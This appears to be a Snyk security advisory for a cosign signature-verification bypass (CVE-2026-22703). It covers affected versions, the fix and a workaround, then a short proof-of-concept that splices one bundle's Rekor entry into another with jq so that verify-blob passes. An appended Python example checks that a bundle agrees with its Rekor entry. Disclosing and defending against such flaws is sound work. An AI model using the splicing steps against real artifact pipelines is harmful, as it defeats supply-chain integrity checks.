Improper Verification of Cryptographic Signature Affecting github.com/sigstore/cosign/pkg/cosign package, versions >=2.0.0 <2.6.2, >=3.0.0 <3.0.4


Severity

medium (CVSS assessment by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.01% (1st percentile)

  • Snyk ID: SNYK-GOLANG-GITHUBCOMSIGSTORECOSIGNPKGCOSIGN-14912562
  • published: 11 Jan 2026
  • disclosed: 10 Jan 2026
  • credit: 1seal

Introduced: 10 Jan 2026

CVE-2026-22703
CWE-347

How to fix?

Upgrade github.com/sigstore/cosign/pkg/cosign to version 2.6.2, 3.0.4 or higher.

Overview

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature via the VerifyBundle function in the verify.go file. An attacker can bypass artifact integrity checks by crafting a bundle that embeds an arbitrary Rekor entry: verification succeeds even though that entry is not actually associated with the referenced digest, signature, or public key.

Note: This vulnerability affects only users who either provide a trusted root via --trusted-root or rely on one that is automatically fetched from a TUF repository, in cases where no trusted key material is supplied via SIGSTORE_REKOR_PUBLIC_KEY.

Workarounds

Manually enforcing trusted key material for the Rekor Transparency Log mitigates the bypass, because the tool then no longer depends solely on the potentially mismatched or unverified data carried inside the bundle.

PoC

# Sign the same blob twice, producing two bundles whose Rekor entries differ
echo blob > /tmp/blob
cosign sign-blob -y --new-bundle-format=false --bundle /tmp/bundle.1 --use-signing-config=false /tmp/blob
cosign sign-blob -y --new-bundle-format=false --bundle /tmp/bundle.2 --use-signing-config=false /tmp/blob
# Splice the second bundle's Rekor entry into the first bundle
jq ".rekorBundle |= $(jq .rekorBundle /tmp/bundle.2)" /tmp/bundle.1 > /tmp/bundle.3
# On affected versions this verification succeeds although the Rekor entry does not match the bundle's signature
cosign verify-blob --bundle /tmp/bundle.3 --certificate-identity-regexp='.*' --certificate-oidc-issuer-regexp='.*' /tmp/blob
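As an added example that is not part of this advisory or of the cosign project, the following Python performs the cross-check that the vulnerable VerifyBundle omitted: it decodes the hashedrekord entry embedded in a legacy-format bundle and confirms that the entry's digest, signature and public key match the blob, base64Signature and cert packaged alongside it. It assumes cosign's legacy bundle layout (top-level base64Signature, cert and rekorBundle.Payload.body), which this page does not spell out, and uses constructed sample data spliced exactly as the jq step above does.

```python
import base64
import hashlib
import json

def rekor_entry_consistent(bundle: dict, blob: bytes) -> list:
    """Cross-check a legacy cosign bundle against its embedded Rekor entry.
    Returns the list of mismatches; an empty list means the hashedrekord
    entry really attests to this blob, this signature and this certificate."""
    payload = bundle["rekorBundle"]["Payload"]
    entry = json.loads(base64.b64decode(payload["body"]))
    if entry.get("kind") != "hashedrekord":
        return [f"unexpected entry kind {entry.get('kind')!r}"]
    spec = entry["spec"]
    problems = []
    if spec["data"]["hash"]["value"] != hashlib.sha256(blob).hexdigest():
        problems.append("digest in Rekor entry does not match blob")
    if spec["signature"]["content"] != bundle["base64Signature"]:
        problems.append("signature in Rekor entry does not match bundle signature")
    # Both fields carry base64 of the PEM certificate; compare the decoded bytes.
    entry_key = base64.b64decode(spec["signature"]["publicKey"]["content"])
    if entry_key != base64.b64decode(bundle["cert"]):
        problems.append("public key in Rekor entry does not match bundle certificate")
    return problems

# --- constructed sample data (no real signatures or certificates) ---
BLOB = b"blob\n"  # what `echo blob > /tmp/blob` writes
CERT = base64.b64encode(b"-----BEGIN CERTIFICATE-----\nfake\n-----END CERTIFICATE-----\n").decode()
SIG_1 = base64.b64encode(b"signature-from-first-signing").decode()
SIG_2 = base64.b64encode(b"signature-from-second-signing").decode()

def make_bundle(sig_b64: str, digest: str) -> dict:
    """Build a bundle whose Rekor entry matches its own signature and cert."""
    entry = {"apiVersion": "0.0.1", "kind": "hashedrekord", "spec": {
        "data": {"hash": {"algorithm": "sha256", "value": digest}},
        "signature": {"content": sig_b64, "publicKey": {"content": CERT}}}}
    body = base64.b64encode(json.dumps(entry).encode()).decode()
    return {"base64Signature": sig_b64, "cert": CERT, "rekorBundle": {
        "SignedEntryTimestamp": "constructed", "Payload": {
            "body": body, "integratedTime": 0, "logIndex": 0, "logID": "constructed"}}}

DIGEST = hashlib.sha256(BLOB).hexdigest()
BUNDLE_1 = make_bundle(SIG_1, DIGEST)
BUNDLE_2 = make_bundle(SIG_2, DIGEST)
# The splice the advisory's jq one-liner performs: bundle 1 with bundle 2's Rekor entry.
BUNDLE_3 = dict(BUNDLE_1, rekorBundle=BUNDLE_2["rekorBundle"])

if __name__ == "__main__":
    print("bundle.1:", rekor_entry_consistent(BUNDLE_1, BLOB) or "consistent")
    print("bundle.3:", rekor_entry_consistent(BUNDLE_3, BLOB) or "consistent")
```

This checks only that the entry's contents agree with the bundle; it does not validate the signed entry timestamp or the signature itself, so it complements the upgrade rather than replacing it.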
